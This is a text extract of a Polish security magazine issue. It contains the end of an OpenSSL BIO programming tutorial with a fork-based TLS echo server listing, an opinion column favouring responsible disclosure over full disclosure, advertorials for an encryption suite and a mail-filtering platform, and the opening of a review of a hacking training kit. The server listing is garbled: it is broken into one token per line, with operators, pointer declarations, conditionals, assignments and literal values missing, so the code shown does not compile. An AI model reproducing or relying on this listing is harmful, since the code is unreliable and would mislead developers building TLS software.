część naszego klienta.

Po otrzymaniu wskaźnika na

połączenie ssl, warto jeszcze usta-
wić flagę

SSL _ MODE _ AUTO _ RETRY

dzięki  której  nie  musimy  się  mar-
twić  o  problem  z  częściowym  wy-
konaniem  operacji  zapisu  czy  od-
czytu  –  zatroszczy  się  o  to  proto-

kół. W tym miejscu jesteśmy w koń-
cu gotowi do zrealizowania w koń-
cu połączenia – zrobimy za pomo-
cą funkcji

BIO _ do _ connect()

. Na-

stępnym krokiem, jaki zrobimy  jest
zweryfikowanie  certyfikatu  ser-
wera  (

SSL _ get _ verify _ result()

)

Listing 8.

Ssl-server.c – główna funkcja

define

DEFAULTPORT

"4433"

define

CERTIFICATE_FILE

/home/drg/ssl1/clients/cert-server.pem"

define

PRIVATE_KEY

/home/drg/ssl1/clients/cert-server-key.pem"

define

DH_FILE

/home/drg/ssl/clients/dhserver.pem"

define

RESPONSE

HTTP/1.0 200 OK

\r\n

Content-type:

text/plain

\r\n\r\n

void

sigchild_handler

(

int

sig

);

SSL_CTX

server_ssl_initialize_ctx

();

int

main

(

int

argc

char

argv

)

{

char

portbuff

;

int

;

BIO

listen_bio

;

SSL_CTX

ctx

;

SSL

ssl

;

char

buf

[

1024

];

int

len

;

(!(

ctx

server_ssl_initialize_ctx

()))

{

fprintf

(

stderr

"Niestety.

);

exit

(

);

}

(

argc

)

portbuff

strdup

(

argv

[

]);

else

portbuff

strdup

(

DEFAULTPORT

);

signal

(

SIGCHLD

sigchild_handler

);

listen_bio

BIO_new_accept

(

portbuff

);

BIO_set_bind_mode

(

listen_bio

BIO_BIND_REUSEADDR

);

(

BIO_do_accept

(

listen_bio

)

{

fprintf

(

stderr

"Błąd w

przygotowaniu do obsługi klientów.

);

ERR_print_errors_fp

(

stderr

);

exit

(

);

}

while

(

)

{

BIO

client_bio

BIO_new_ssl

(

ctx

);

BIO

buffered_bio

;

BIO_get_ssl

(

client_bio

ssl

);

ssl

)

{

fprintf

(

stderr

"Błąd ssl.

);

ERR_print_errors_fp

(

stderr

);

BIO_free_all

(

listen_bio

);

SSL_CTX_free

(

ctx

);

exit

(

);

}

SSL_set_verify

(

ssl

SSL_VERIFY_

PEER

SSL_VERIFY_CLIENT_

ONCE

NULL

);

SSL_set_mode

(

ssl

SSL_

MODE_AUTO_RETRY

);

BIO_set_accept_bios

(

listen_bio

client_bio

);

(

BIO_do_accept

(

listen_bio

)

{

fprintf

(

stderr

"Błąd w

przyjmowaniu połączenia.

);

ERR_print_errors_fp

(

stderr

);

continue

;

}

client_bio

BIO_pop

(

listen_bio

);

fork

();

(

)

{

fprintf

(

stderr

"Mam mowego

klienta, pid=%d

);

continue

;

}

(

)

{

fprintf

(

stderr

"Błąd w tworzeniu

nowego procesu: %s.

strerror

(

errno

));

BIO_free

(

client_bio

);

continue

;

}

(

BIO_do_handshake

(

client_bio

)

{

fprintf

(

stderr

"Błąd podczas

SSL handshake.

);

ERR_print_errors_fp

(

stderr

);

BIO_free_all

(

client_bio

);

return

;

}

buffered_bio

BIO_new

(

BIO_f_

buffer

());

client_bio

BIO_push

(

buffered_

bio

client_bio

);

BIO_puts

(

client_bio

RESPONSE

);

while

(

)

{

len

BIO_gets

(

client_bio

buf

1024

);

(

len

)

{

fprintf

(

stderr

"Błąd w

czytaniu z gniazda.

);

ERR_print_errors_fp

(

stderr

);

break

;

}

BIO_write

(

client_bio

buf

len

);

((

buf

[

]

)

(

buf

[

]

))

break

;

}

BIO_puts

(

client_bio

"milo,

ze wpadles.

\r\n

);

BIO_flush

(

client_bio

);

BIO_free_all

(

client_bio

);

exit

(

);

}

(

portbuff

)

free

(

portbuff

);

return

;

}

oraz wyświetlenie informacji na je-
go temat przy pomocy mało ambit-
nej funkcji przedstawionej na Listin-
gu 5.

Teraz, po upewnieniu się, że

połączenie SSL/TLS jest już finalnie
zestawione (

BIO _ do _ handshake()

możemy rozpocząć wymianę da-
nych – mamy do dyspozycji takie
funkcje jak

BIO _ read()

BIO _ write()

BIO _ gets()

oraz

BIO _ puts()

. Wy-

syłamy zatem zapytanie HTTP
zdefiniowane w

REQUEST

, po czym

odbieramy  dane  i  wyświetlamy  je
na  standardowe  wyjście.  Na  końcu
wypada  posprzątać  łańcuch  BIO
za pomocą funkcji

BIO _ free _ all()

oraz szczęśliwie zakończyć pro-
gram. Kompilacja oraz przykładowe
uruchomienie programu przedsta-
wia Rysunek 1.

Zaserwujmy coś

Analogicznie do przypadku klienta,
napiszemy funkcje

server _ ssl _

initialize _ ctx()

inicjalizującą kon-

tekst SSL – znajduje się ona na Li-
stingu  6.  O  ile  serwer  nie  oczeki-
wał  od  klienta  certyfikatu,  o  tyle
klient serwerowi już pod tym wzglę-
dem  nie  popuści.  Za  pomocą  funk-
cji

SSL _ CTX _ use _ certificate _ file()

SSL _ CTX _ use _ PrivateKey _ file()

serwer  załaduje  wcześniej  stworzo-
ny  certyfikat  oraz  pasujący  do  nie-
go klucz prywatny. O faktyczne przy-
pasowanie  klucza  prywatnego  do
certyfikatu  zatroszczy  się  funkcja

SSL _ CTX _ check _ private _ key()

W odróżnieniu od klienta ser-

wer  ustawia  parametry  dla  algoryt-
mu  Diffiego-Hellmana  za  pomocą
kombinacji  funkcji

BIO _ new _ file()

PEM _ read _ bio _ DHparams()

oraz

SSL _ CTX _ set _ tmp _ dh()

. Nasz ser-

wer dla każdego nowego klienta bę-
dzie tworzył nowy proces potomny
funkcją

fork()

. Stąd w celu uniknię-

cia procesów zombie, przechwytuje-
my sygnał SIGCHLD, który wysyła-
ny jest po zakończeniu procesu po-
tomnego:

signal(SIGCHLD, sigchild_handler);

Jego obsługą zaś zajmie się funkcja

sigchild _ handler

przedstawiona na

Listingu 7, która wyświetli informację,
czy proces umarł ze starości, czy też
nastąpiło to przedwcześnie wsku-
tek nieszczęśliwego wypadku (na
przykład poprzez wysłanie do niego
określonego sygnału).

Przyszedł w końcu moment na

zastosowanie BIO po stronie serwe-
ra. Funkcja

BIO _ new _ accept()

z po-

danym jako argument numeru port (w
postaci tekstu) stworzy nowy łańcuch
BIO, za którym schowa się obsługa
sieci – znów nie trzeba wypełniać żad-
nych struktur adresowych czy tworzyć
gniazd. Do rozpoczęcia nasłuchu słu-
ży funkcja

BIO _ do _ accpet()

. Pierw-

sze jej wywołanie przygotuje BIO do
nasłuchu, następne będzie już oczeki-
wało na nowe połączenia. Każde no-
wo zaakceptowane połączenie trafi do
BIO łańcucha o nazwie

listen _ bio

Konstrukcja

client_bio = BIO_pop(listen_bio);

zdejmie klienta z łańcucha

listen _

bio

, dzięki czemu serwer będzie

mógł przyjmować nowe połączenia,
a do obsługi stworzy  proces potom-
ny.  Po  pomyślnym  zestawieniu  po-
łączenia  (

BIO _ do _ handshake()

) pro-

ces potomny stworzy i doda do łań-
cucha BIO

client _ bio

BIO filtrują-

BIO _ f _ buffer()

, które zapewni

buforowane  wejście  i  wyjście  w  ko-
munikacji z klientem. Następnie ser-
wer wysyła na  ślepo klientowi przy-
kładową odpowiedź HTTP, po czym
odczytuje dane od klienta (zapytanie
HTTP), odsyła mu je i na końcu do-
daje coś od siebie. Na Rysunku 2 wi-
dać  kompilację  i  działanie  serwera,
który dobrze obsługuje zarówno na-
szego  własnoręcznie  zbudowanego
klienta, jak i popularną przeglądarkę
WWW.  Listing  8  natomiast  zawiera
źródła z sercem naszego demona.

Podsumowanie

Programowanie z biblioteką Openssl
nie jest wcale tak trudne, jak by się to
mogło  wydawać.  Wprawdzie  przed-
stawione  w  artykule  przykłady  są
bardzo proste, widzimy w jaki łatwy
sposób  –  zwłaszcza  dzięki  abstrak-
cyjnym BIO – w łatwy sposób można
zestawić szyfrowane połączenie. l

hakin9 Nr 4/2007

www.hakin9.org

Felieton

ak w każdym zjawisku zachodzącym na masową
skalę, tak i w bezpieczeństwie technologii infor-
matycznych, z socjologicznego punktu widze-

nia  można  wyróżnić  pojawiające  się,  lub  zanikające
trendy,  które  w  określonym  czasie  cieszą  się  więk-
szym, bądź mniejszym zainteresowaniem. Te bardziej
znaczące i rewolucyjne potrafią zmienić dotychczaso-
we paradygmaty (w tym znaczeniu – wzorcowe przy-
kłady  tworzone  na  podstawie  historii  rozwoju  zabez-
pieczeń) w sektorze security.

Anomalią towarzyszącą w tworzeniu pewnych kano-

nów  postępowania  w  sferze  bezpieczeństwa  syste-
mów, czy ogólnie oprogramowania, jest fakt, że zazwy-
czaj powstające trendy nigdy nie rozwijają się dokład-
nie  w  tym  kierunku,    który  na  początku  przewidywali
jego  twórcy.  Gruntownym  tutaj  przykładem  z  poziomu
antropologii  pokazującym  esencję  powyższych  stwier-
dzeń  jest  tzw.  trend  sekularny  (zachodzący  pod  wpły-
wem rozwoju cywilizacji) hackingu, który jest nieodłącz-
ną częścią bezpieczeństwa IT, a nawet jego fundamen-
tem.  Ukazuje  on  z  perspektywy  historycznej  główną
wadę poglądu full disclosure (pełne ujawnienie błędów),
którego  głównym  założeniem  jest  podanie  do  opinii
publicznej  wszystkich  informacji  dotyczących  odkry-
tych błędów w zabezpieczeniach informatycznych, włą-
czając  w  to  wszelkie  dane  techniczne  oraz  narzędzia
(exploity), które wykorzystują te błędy i pozwalają na ich
dokładną analizę.

Termin hacking w pierwotnym znaczeniu wcześnie

tworzonego  żargonu  informatycznego  był  między-
narodowym  określeniem  czynności,  które  pokonują
wszelkie  zabezpieczenia  w  postaci  kodów  i  haseł
zastrzeżonych dla osób wtajemniczonych, pozwalając
tym samym włamać się do sieci komputerowych. Był
to pierwszy trend wśród użytkowników wykorzystują-
cych  ogólnodostępne  źródła  informacji  w  Internecie.
W  tamtych  czasach  odpowiedniki  dzisiejszych  forów
– BBSy (biuletyny komputerowe) roiły się od praktycz-
nych porad i wskazówek dosłownie ukazujących krok
po kroku słabości ówczesnych systemów. W dodatku
na  rynku  wydawniczym  królowała  pozycja  Hacke-

r's Handbook Hugo Cornwalla stanowiąca główny
poradnik początkujących włamywaczy. Wszystko to

Niezdrowe trendy

w bezpieczeństwie

– full disclosure

spowodowało obranie złej drogi przez panującą modę
i  metodę  prezentacji  informacji,  wymykając  się  spod
kontroli  jej  autorów  –  jakakolwiek  osoba  nie  mająca
większego  pojęcia  o  technice  komputerowej  i  uboga
umysłowo  była  w  stanie  opanować  parę  chwytów,
zdobyć adresy, kody, hasła i dostać się do baz danych
i  systemów  państwowych.  Wówczas  zorganizowano
wiele  konferencji,  aby  ukształtować  finalną  etykę
hackerów oraz stworzyć prawdziwe podziemie w Sieci
dostępne  tylko  wąskiej  grupy  specjalistów.  Głównym
czynnikiem, który wpłynął na tą rewolucję było prawo,
które  w  przeszłości  bardzo  powolnie  podążało  za
problemami pojawiającymi się w wraz z rozpowszech-
nianiem  się  technik  przestępstw  komputerowych.  To
wraz z jego reinterpretacją oraz stworzeniem nowych
przepisów nastąpiła akceleracja rozwoju świadomości

Patryk Krawaczyński

O autorze

Autor aktualnie jest studentem II roku Informacji Naukowej na
Uniwersytecie Mikołaja Kopernika w Toruniu. W wolnych chwi-
lach  stara  się  prowadzić  serwis  poświęcony  podstawowym
aspektom  bezpieczeństwa  systemu  Linux  (www.narf.shl.pl)
poddając  analizie  i  opisowi  sprawdzone  mechanizmy  jego
zabezpieczeń.
Kontakt z autorem: agresor@narf.shl.pl

hakin9 Nr 4/2007

www.hakin9.org

Felieton

samozachowawczej  osób  dyktujących  warunki  bez-
pieczeństwa  Internetu.  Można  było  wtedy  wyraźnie
zaobserwować odłączenie się grup guru od przecięt-
nych  skrypciaków  (ang.  script  kiddie),  co  zakończyło
erę  bezlitosnych  nadużyć  informacji  przeznaczonych
dla  osób  z  branży.  I  oto  bez  podłoża  genetycznego
nastąpiła  zmiana  przystosowawcza  do  panujących
warunków  wśród  hackerów,  którzy  stali  się  warto-
ściowymi  osobami  posługującymi  się  szeroką  gamą
języków  programowania,  potrafiących  porozumiewać
się  z  wieloma  odmianami  systemów  obsługujących
sieci  i  posiadających  dość  inwencji,  by  udoskonalać
nowe, i już istniejące mechanizmy zabezpieczeń, a co
najważniejsze - o wykrytych lukach powiadamiali naj-
pierw producentów oprogramowania.

Historia, która lubi się powtarzać, ukazuje, że

wraz  z  ciągłym  rozwojem  technologii  internetowych
zwiększa się prawdopodobieństwo naruszenia bezpie-
czeństwa już istniejących zabezpieczeń. Każda nowa
technika ataku, narzędzie, czy technologia sprzętowa
daje nowe możliwości w starych warunkach, a jeszcze
większa rola wiarygodnych źródeł informacji pogłębia
to  zjawisko.  Ostatnio  szczególnie  jest  to  widoczne
w  bezpieczeństwie  serwerów  rządowych,  które  są
masowo  testowane  przez  niezależne  serwisy  zajmu-
jące  się  tematyką  bezpieczeństwa.  W  wielu  przypad-
kach niski poziom bezpieczeństwa wynika z ignorancji.
Wśród administratorów tych systemów panuje przeko-
nanie, wynikające z braku wiedzy i pewności, że do ich
systemu  nie  można  się  włamać.  Zatrudniani  są  prze-
ciętni  fachowcy,  którzy  nie  są  zbytnio  zainteresowani
obsługiwanym  przez  nich  systemem.  Znudzeni  nie
reagują na zgłoszenia osób z zewnątrz, a swoją pracę
wykonują  jedynie  dla  pieniędzy.  O  ile  początkowa
wina  leży  po  stronie  celów  audytów  informatycznych,
tak  wiele  razy  serwisy  powiadamiające  o  tych  zanie-
dbaniach,  zbyt  szybko  ujawniają  krytyczne  informa-
cje  powodując  automatycznie  dodatkowe  ataki  na  te
serwery.  Błędem  jest  tutaj  zmiana  kolejności  etapów
wtajemniczenia  osób  postronnych.  W  celu  uzyskania
wyraźnego rozgłosu podaje się najpierw do informacji
publicznej zaistniałe fakty, a dopiero potem powiada-
mia  się  o  nich  samych  zainteresowanych  czekając
na  ich  oświadczenia.  Pozostawia  to  lukę  czasową
pozwalającą na działanie osób o nie w pełni sprecyzo-
wanych  zamiarach,  które  dodatkowo  wyposażone  są
w techniczne szczegóły ujawniane często także, przez
samych testerów mających na względzie błędnie rozu-
mowane dobro publiczne.

Analogiczna sytuacja ma miejsce w przypadku

wypuszczania przez programistów exploitów typu 0-

day (zerowego dnia) oraz proof of concept (dowodów
na  poprawność).  Kod  takich  exploitów  publikowany
jest  w  bardzo,  krótkim  czasie  po  oficjalnym,  lub  nie-
oficjalnym  ogłoszeniu  istnienia  określonej  podatności

w  systemie,  czy  programie,  lecz  zanim  producent  /
autor oprogramowania wypuści poprawkę naprawiają-
cą ów błąd. Dopóki tego nie zrobi, wszyscy użytkow-
nicy  korzystający  z  danej  marki  pozostają  w  realnym
zagrożeniu.  Kontrastem  dla  tej  sytuacji  może  być
fakt  wypuszczenia  przez  niezależnego  programistę
poprawki.  Problemem  w  tym  przypadku  jest  także
złe  wykorzystanie  informacji.  Bardzo  wiele  razy
podaje się od razu dane dotyczące możliwości szyb-
kiej  aktualizacji,  bez  jakiegokolwiek  przewidywania
możliwości  technicznych.  W  ten  sposób  na  serwerze
udostępniającym stronę programisty wykonywany jest
nieświadomy  atak  DDoS  (ang.  Distributed  Denial  of

Service) przez rzucających się jednocześnie na łatę
użytkowników. W dodatku istnieje także obawa, że
nieoficjalna poprawka może wprowadzać niepożądane
zmiany w systemie.

Wymienione powyżej przypadki noszą znamiona

metody pełnego ujawniania, która umożliwia poznanie
pełnej  specyfikacji  wykrywanych  luk.  Odkrywa  ona
szczegóły  dotyczące  konfiguracji  oraz  jakości  stoso-
wanego  oprogramowania,  ale  przy  tym  trafia  do  zbyt
szerokiego  grona  użytkowników,  którzy  nie  zawsze
pozyskane  informacje  wykorzystują  w  odpowiedni
sposób. Mimo to, że zmusza ona dostawców oprogra-
mowania do tego, by tworzyli kod o najwyższej jakości,
w  celu  uniknięcia  publicznej  kompromitacji  –  często
wykorzystywana jest do praktyk brudnego marketingu,
aby pomóc zainteresowanym osobom w doborze kon-
kurencyjnego produktu - nie zawsze bardziej bezpiecz-
nego.  Zwykli  użytkownicy,  nie  będący  programistami
mogącymi samemu dokonać poprawek, pozostają ska-
zani  na  wysoki  stopień  niebezpieczeństwa  oraz  nie-
przemyślane ryzyko. Wszystko to po to, aby konkretne
osoby lub zgrupowania zyskały jednoznaczny rozgłos.
Metoda full disclosure powinna być stosowana głównie
w  przypadku  powiadamiania  dostawców  oprogramo-
wania, aby w jasny i klarowny sposób przedstawić im
sedno problemu, a nawet zasugerować sposób napra-
wy.  W  ten  sposób  cała  wartość  informacji  kierowana
jest do odpowiedniego odbiorcy. Na szczęście w ujęciu
publicznym  trend  ten  cieszy  się  coraz  mniejszym
zainteresowaniem  na  przestrzeni  rozwoju  procedur
ujawniania  luk  w  zabezpieczeniach,  w  którym  katali-
zatorem  jest  ciągły  postęp  technologiczny  i  rosnąca
świadomość wartości wielu informacji. Coraz częściej
stosowanym wariantem tego procesu staje się respon-

sible  disclosure  (odpowiedzialne  ujawnianie),  które
dzięki  wcześniejszemu  powiadomieniu  producentów
pozwala im na wydanie poprawki i publiczne ogłosze-
nie jej dostępności; odczekaniu odpowiedniego okresu
czasu, aż wszyscy odpowiedzialni użytkownicy wyko-
nają aktualizację, a dopiero później publikacji informa-
cji  o  błędzie.  No  i  ze  względu  na  dzisiejszy  hacking
wydaje się to bardziej etyczne. l

Enigma Lite Desktop Edition

GlobalTrust

Dokumenty  firmowe  i  prywatne  dane  osobowe  to
istotne  informacje,  które  musimy  bezwzględnie
chronić  przed  kradzieżą,  złym  wykorzystaniem  i
dostępem  nieautoryzowanych  użytkowników  tak
spoza firmy, jak pracowników. Warto nadmienić, że w
obecnych czasach większość danych personalnych
i  firmowych  jest  przechowywana  w  formie  plików  i
elektronicznych  dokumentów,  przesyłanych  przez
wiadomości e-mail w różnych sieciach.

Pakiet Enigma Lite Desktop Edition oferuje

modularną, wielkoskalową solucję na problemy pr-
zechowywania i przesyłania dokumentów. Spotyka
się z aprobatą nie tylko zwykłych użytkowników,
chroniąc ich stacjonarny, czy przenośny komputer,
ale także wielkich organizacji działających w otwar-
tych i zamkniętych sieciach. Enigma implementuje
najsilniejsze polityki zabezpieczeń w celu ochrony
prywatności plików, e-maili, baz danych oraz ich
sposobu migracji.

DLACZEGO ENIGMA?
(ZMIANY W PRAWIE)

• We Włoszech nowe prawa i zasady zostały

wprowadzone z ustawą D.Lgs 196/2003, znaną
także  jako  “The  Privacy  Code”  (Prywatność
Danych).  Zgodnie  z  postanowieniami,  należy
chronić prywatne dane przed ryzykiem zniszc-
zenia,  zagubienia  oraz  nieautoryzowanego
dostępu.  Dlatego  właśnie  wielkie  korporacje  i
profesjonaliści  muszą  zaimplementować  mi-
nimalne sposoby zabezpieczeń procesowania
danych utajnionych.

• Według ustawy, tajne dane elektroniczne (np.

sądowe, czy informacje o zdrowiu pracowników)
muszą być zakodowane przy użyciu najlep-
szych technik obecnie dostępnych na rynku.

• Ustawa przewiduje kary za niezastosowanie

się do jej postanowień, a tym samym łamanie
prawa.

DLACZEGO ENIGMA?
(RYNEK WŁOSKI)

We Włoszech istnieje silne zapotrzebowanie na
łatwe w implementacji i użyciu oprogramowanie

służące do zabezpieczania dokumentów elektro-
nicznych na komputerach stacjonarnych i prywa-
tnych (przede wszystkim przenośnych). Zapotrze-
bowanie takie istnieje w wielu sektorach:

• wojskowym (np. enkrypcja utajnionych doku-

mentów)

• finansowym (np. przekazywanie pewnych

wiadomości elektronicznych)

• u dostawców usług internetowych (ang. ISP)

(np. zabezpieczanie transakcji w sieci web
oraz archiwizacja)

• w integratorach systemowych (np. jako narzędzie

do bezpiecznej migracji dokumentów)

• na uniwersytetach i innych placówkach eduka-

cyjnych

•   w firmach
•   u kupców detalicznych (SW/HW)
•   i innych.

Jednak konkurencyjne oferty nie są adekwatne do po-
trzeb, używają systemów (BestCrypt, Signo, czy PGP)
mało znanych i niezbyt rozpowszechnionych.

FUNKCJONALNOŚĆ
SYSTEMU ENIGMA

Silniejsze  Zabezpieczenie  Prywatności  Enigma  Lite
Desktop  Edition  jest  najlepszym  rozwiązaniem  do
manipulacji  danymi  personalnymi,  które  spełnia
wymogi praw i ustaw (D.Lgs. n. 196/2003). Enigma
Lite Desktop Edition pozwala scentralizować wszys-
tkie  operacje,  które  wymagane  są  przy  dostępie
do  prywatnych  danych  personalnych  lub  korpora-
cyjnych:  podpisy  elektroniczne,  kryptografie,  bez-

pieczne przechowywanie, oznaczanie znacznikami
czasowymi, bezpieczna destrukcja, autentykacja
oraz weryfikacja elektronicznych certyfikatów.

Jest środowiskiem zintegrowanym z syste-

mami Windows i pakietem Microsoft Office

Enigma Lite Desktop Edition jest rozwiązaniem

zaprojektowanym pod kątem systemów operacyj-
nych firmy Microsoft: komponenty Ochrony Doku-
mentów  są  w  pełni  zintegrowane  z  maszynami
klienckimi  działającymi  na  systemach  Windows,
zaś  komponenty  serwerowe  są  instalowane  na
systemach typu MS Windows Server.

Enigma Lite Desktop Edition używa najbardziej

zaawansowanych mechanizmów kryptograficznych,
jest kompatybilna ze standardami X.509 i SSL v.3.0. Po-
zwala na manipulację elektronicznymi certyfikatami i
tożsamościami. Dodatkowo, Enigma jest kompatybilna
ze standardami Common Access Card (CAC) i PKC#11
(Standard Interfejsów Tokenów Kryptograficznych),
pozwalając na używanie SmartCards i Tokenów USB.

• Kupno:

https://

www.globaltrust.it/software_
buy/enigmalitedesktopedition_
12.aspx

• Witryna producenta:

http:

//www.globaltrust.it

Kontakt:

O GlobalTrust

GlobalTrust  jest  firmą  zajmującą  się  certyfikowaniem
i  rejestrowaniem,  rozpoznawaną  na  całym  świecie,
która  oferuje  wdrażanie  wszystkich  typów  certyfika-
tów i zabezpieczeń technologii cyfrowych przy użyciu
najbardziej  zaawansowanych  technik  zabezpieczeń,
autentykacji  i  weryfikacji.  GlobalTrust  to  niezależny
znawca  w  zakresie  typów  ataków  przeprowadzanych
w Sieci. Dzięki swoim technologiom, GlobalTrust pozwala
organizacjom  wszelkich  rozmiarów  na  zabezpiecza-
nie  transakcji  elektronicznych,  zawsze  utrzymując
korzystną proporcję ceny do jakości.

MESSAGE PROCESSING PLATFORM
(MPP) - SYSTEM OCHRONY POCZTY

MPP  amerykańskiej  firmy  Message  Partners
pozwala  zaoszczędzić  cenny  czas  każdego
administratora  –  łącząc  prostotę  z  zaawansowa-
nymi  możliwościami  szczegółowej  konfiguracji.
Dzięki  systemowi  poczta  jest  chroniona  przed
spamem  i  wirusami,  możemy  filtrować  jej  treść,
a  także  archiwizować  wiadomości  przychodzące
i  wychodzące  –  ale  to  tylko  podstawowe  funkcje.
Prawdziwego  „smaczku”  dodają  systemowi  jego
pozostałe możliwości.

MODUŁOWA BUDOWA

MPP  posiada  modułową  budowę,  dzięki  czemu
łatwo  może  zostać  dopasowany  do  potrzeb,  a
także  umożliwia  łatwą  rekonfigurację  całego
systemu  pocztowego.  Podstawę  stanowi  moduł
zarządzający  MPP,  działający  poprzez  https,  w
którym  administrator  definiuje  całość  polityk
bezpieczeństwa dla poczty w firmie. Do modułu
zarządzającego  dołączane  są  dodatkowe  ska-
nery  –  antywirusowe  i  antyspamowe.  W  wersji
podstawowej  MPP  korzysta  ze  SpamAssassina
i  Clam-AV,  natomiast  dla  wzmocnienia  ochrony,
administrator może dokupić komercyjne skane-
ry  zintegrowane  z  MPP  (antywirusowe:  NOD32,
Kaspersky,  Sophos,  antyspamowe:  Cloudmark  i
Mailshell).

MPP wykorzystuje wszystkie skanery poczty

jako  engine’y  skanujące.  Zadaniem  np.  skanera
ClamAV  współpracującego  z  MPP  jest  przyjęcie
e-maila  od  MPP,  przeskanowanie  go  i  odesłanie
informacji  o  rezultacie  oraz  ewentualnie  e-maila
z  naprawionym  lub  usuniętym  załącznikiem.
Właśnie dzięki takiemu rozwiązaniu, administrator
nie  musi  się  zaprzątać  sobie  głowy  ustawieniami
poszczególnych skanerów.

JAK SZYBKO ZMIENIĆ
ANTYWIRUSA W CAŁEJ FIRMIE?

W  zależności  od  zdefiniowanych  polityk,  różne
grupy  użytkowników  mogą  korzystać  z  różnych
skanerów  lub  też  z  kilku  skanerów  jednocześnie
(typowa  sytuacja  np.  dla  providera  posiadającego
konta  darmowe  i  komercyjne).  Jeśli  stwierdzimy,
że jakaś grupa ma korzystać z innego skanera niż
dotychczas  używany,  możemy  go  podmienić,  nie
naruszając  pozostałych  ustawień.  Cała  operacja
trwa  kilka  sekund  -  po  prostu  z  listy  skanerów
wybierzemy  nowy,  klikamy  –  i  to  wszystko.  Nowy
skaner  skanuje  pocztę,  a  cała  konfiguracja  polityk
pozostaje niezmieniona.

Równie prosta jest hipotetyczna zmiana

obsługującego  naszą  pocztę  serwera.  Pomijając
fakt, że sama zamiana z serwera np.: Sendmail na
Postfixa byłaby dość czasochłonna, jeśli wcześniej
filtrowaliśmy  pocztę  za  pośrednictwem  MPP,  nie
musimy  się  przejmować  konfiguracją  skanerów
poczty. Wystarczy bowiem w MPP zamienić jedną
linię  w  pliku  konfiguracyjnym  lub  wybrać  nowy
serwer  pocztowy  w  panelu  https,  aby  wszystkie
skanery  z  tymi  samymi  ustawieniami  zaczęły
współpracować z nowym serwerem pocztowym.

Cały system może być zarządzany z konsoli w

trybie graficznym. Dzięki temu nic nie konfiguru-
jemy z linii poleceń. Po prostu wybieramy to, co nas
interesuje, klikając na odpowiednie opcje. W ten
sposób tworzymy szerokie polityki bezpieczeństwa
dla różnych działów w firmie, wszystko według in-
dywidualnych potrzeb.

JAK ZMINIMALIZOWAĆ
ILOŚĆ PYTAŃ UŻYTKOWNIKÓW?

Opcjonalnie  dostępne  są  moduły  do  zarządzania
kwarantanną i archiwum. Sprawdzanie kwarantanny
każdego pracownika, odpowiadanie na pytania typu
–  „czy  coś  nie  zostało  zatrzymane,  bo  czekam  na
ważny e-mail?” – mogą wyprowadzać z równowagi i
zajmować dużo czasu. Dzięki modułom przeglądania
kwarantanny  z  poziomu  przeglądarki,  każdy  pra-
cownik sam może teraz sprawdzać e-maile logując
się na odpowiedniej stronie WWW. Moduły są na tyle
przejrzyste i czytelne, iż nawet słabo zorientowany
pracownik da sobie z nimi radę. Każdy użytkownik
w  swoim  katalogu  kwarantanny  i  archiwum  może
przejrzeć listę e-maili, wyszukiwać przesyłki w opar-

ciu o różne kryteria, przesyłać, uwalniać z kwaran-
tanny, usuwać e-maile, a także tworzyć własną białą
i czarną listę adresów. Jeśli administrator chce, aby
użytkownicy mieli zawsze „przy sobie” cały swój
spam, możemy tak skonfigurować MPP, aby wszyst-
kie e-maile spamowe były wrzucane do specjalnego
spamowego katalogu (IMAP) dostępnego do subs-
krypcji dla każdego użytkownika MPP. Wszystko to
bez zaprzątania uwagi administratora.

OSZCZĘDNOŚĆ ZASOBÓW SERWERA

Przy współpracy z serwerem Postfix dodatkową
zaletą jest wbudowany w MPP Postfix Policy Server,
pozwalający odrzucić niepożądane e-maile zanim
trafią one na serwer pocztowy. Dzięki tej funkcji,
można większość spamu odrzucać już na poziomie
sesji SMTP. To MPP podejmuje decyzję, czy odrzucić
wiadomość, zanim trafi ona na serwer, czy pozwolić
na jej przekazanie i przeskanowanie przez system.

Warto wspomnieć także o funkcji body

stripping.  Pozwala  nam  ona  na  odłączenie  od
wiadomości  jej  załącznika,  zapisania  go  na  se-
rwerze  ftp  lub  http,  a  następnie  dołączenie  do
maila linka do miejsca, w którym został zapisany
załącznik. Dzięki temu mamy lepszą kontrolę nad
przepływem  dokumentów  oraz  zmniejszamy
rozmiary  skrzynek  pocztowych.  Załączniki
możemy filtrować w oparciu o rozmiar, nazwę lub
na  przykład  typ  załącznika.  Wyobraźmy  sobie
dość częstą sytuację archiwizacji poczty. Chcemy
archiwizować  tylko  małe  maile,  bez  załączników.
Dzięki  odcinaniu  załączników,  można  zrobić
wszystko - także pozwolić na przesyłanie dużych
wiadomości.

MPP to system w sposób kompleksowy

zabezpieczający serwer poczty przy minimalnym
nakładzie  pracy.  Pośrednie  podpięcie  do  serwera
pocztowego  można  oczywiście  zrobić  za  pomocą
AmavisD.  Skonfigurować  wszystko  można  w
każdym  skanerze  osobno.  Przepływem  poczty
można  sterować  zawsze  z  poziomu  serwera.
„Statystyczne” podejście do skanowania antyspa-
mowego  to  np.:  Vipul’s  Razor  czy  D-Spam.  Ale  po
co? Czy naprawdę jesteśmy w stanie poświęcić tak
wiele  czasu  na  konfigurowanie  wszystkich  tych
programów  z  osobna?  Wdrażając  MPP,  możemy
skupić  się  na  znacznie  przyjemniejszych  zada-
niach...

DAGMA sp. z o.o.,
wyłączny dystrybutor MPP
w Polsce,

mpp@dagma.pl,

tel. (32) 259 11 00.

Kontakt:

KLUB TECHNICZNY

JAK MNIEJ CZASU POŚWIĘCAĆ NA
ADMINISTROWANIE POCZTĄ?

hakin9 Nr 4/2007

www.hakin9.org

Szkoła Hakerów

Wydawnictwo : csh

ISBN : 83-9237-450-9

Liczba stron : 426

Oprawa : Miękka

Księgozbiór

Zestaw szkoleniowy

Zestaw szkoleniowy możemy nabyć na kilka sposobów,
za pomocą strony internetowej producenta, za pomocą
aukcji internetowej, oraz można ją nabyć jako prezent
wraz z prenumeratą pisma Haking. Zamawiając zestaw
szkoleniowy otrzymamy :

•   Podręcznik
•   Szkoleniowy system operacyjny
•   Zestaw filmów instruktażowych
•   Dostęp do zamkniętej części forum dyskusyjnego
•   Możliwość wzięcia udziału w egzaminie potwierdzają-

cym kwalifikacje oraz umożliwia otrzymanie certyfikatu

Wszystko to otrzymamy w estetycznym kartonowym opa-
kowaniu.

Podręcznik

Podręcznik został podzielony na rozdziały tematycz-
ne, dzięki temu materiał jest uporządkowany i nie trzeba
“skakać” po rozdziałach. Książka krok po kroku wprowadza
w tajniki wiedzy z zakresu hackingu - zarówno tej podsta-
wowej, jak i zaawansowanej. Obszerny materiał w postaci
426 stronicowej książki, który zawierają: przykłady, przy-
padki oraz informacje o tym, jak działają hakerzy, a także
ćwiczenia, dzięki którym nabierzesz praktycznych umiejęt-
